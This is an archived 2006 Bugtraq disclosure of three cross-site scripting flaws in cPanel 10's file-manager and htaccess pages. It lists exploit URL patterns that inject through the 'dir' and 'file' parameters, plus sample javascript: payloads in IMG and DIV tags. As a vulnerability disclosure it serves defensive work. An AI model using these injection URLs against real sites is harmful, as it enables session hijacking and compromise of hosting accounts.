lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 16 Aug 2006 03:48:51 -0000
From: preth00nker@...il.com
To: bugtraq@...urityfocus.com
Subject: Multiple xxs cPanel 10

#####################################################  
##  
##        << Multiple cross site script >>   
##  
##              C P A N E L   1 0  
##  
##       Preth00nker [at] gmail [dot] com
##                BY PRETH00NKER  
##             http://mexhackteam.org  
##  
##           special dedication for my friends of:  
##              <<http://www.elhacker.net>>  
##  
##  
######################################################  
  
   [ introduction ]  
  
Preth00nker was discovering some news vulnerabilities in cpanel 10.  
Cite: cPanel allows domain owners to manage and monitor their web site.   
This easy to use interface is packed full of useful features. Inside   
cPanel, domain owners can control their web site to a degree which was   
never before possible. cPanel gives domain owners a flexibility beyond   
that of the competition.  
Refer:http://www.cpanel.net/products/cPanelandWHM/linux/cpanelov.htm  
  
  
   [ Explanations: ]   
  
Exploit #1: http://[Target:port]/frontend/x/htaccess/dohtaccess.html?dir=>[Your Code here]  
Condition's labels: just a ! > ! next the script.  
In first case we can see that an error happen in the $dir variable   
inside 'dohtaccess.html' file; When the applications can't find the   
folder that you request the script   
print next code in the checkbox  
  
//------------ Start -------------------  
<input type="checkbox" name="protected" Internal Error, can't find that folder [/home/user/public_html/isn0taf0lder]  
\\------------- EOF --------------------  
  
We can see that, if we close the label then now can start the insertion   
of an arbitrary code here.  
  
  
  
Exploit #2: http://[Target:port]/frontend/x/files/editit.html?dir=/&file=">[Your Code here]  
Condition's labels: just a ! "> ! next the script.  
every time the script is printing something like this  
  
//------------ Start -------------------  
Save file as: <input type="text" value="FILE HERE" name="file">  
\\------------- EOF --------------------  
  
in this case, too we can see that the $file variable inside   
'editit.html' file is not filtrated of a secure way, just is  
necessary that close the textarea for that an attacker can insert   
a script into the page.  
  
  
  
Exploit #3: http://[Target:port]/frontend/x/files/showfile.html?dir=/&file=[Your Code here]  
Condition's labels: without ! <script> ! labels  
in this ultimate case we can see that one more times the   
'showfile.html' has an error at the moment of filtrate the   
labels, because just do it with < script >'s labels, an attacker  
can take advantage of this situation and inject some code like  
  
//------------ Start -------------------  
  
  <IMG SRC="javascript:alert()" />  
    
  <DIV STYLE="background-image: url(javascript:alert('ĦB00M!'))" >  
  
  or some thing like this...  
  
\\------------- EOF --------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ